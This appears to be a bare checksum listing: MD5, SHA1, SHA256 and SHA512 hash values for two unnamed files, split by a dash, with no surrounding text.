SHA256 d57ec17500aea8a048efd62c919c4d150f74e44ed778f7be7985bea2696665b5
SHA512 3f8adab343f1997fb12b6df9ac7ff19b9ab100c74f25785c4e70739e52454bbc7dd726184671729fffd993aa2b96fc0f6954d27a4c3d987ac7e3a4c7c503e1d5
-
MD5 5f00eabb52cff99b488fd8202cb2ad3a
SHA1 cd7d4f0d9fff26b1611cb2ef2f9c82068f5e9578
SHA256 282c1b1267b62b839a830fa1e36cea4a79d65ed73d696050f3478fe514d44ba2
SHA512 d0c9bc686b17a8faa66cd08ca4c80deac20ca93e5b89b9750ed6a4da2cd426ca5901ef44ba6930cb19e386f30c56fc11a6a6bfd9f40e88fa77d0c1fe8e2355ee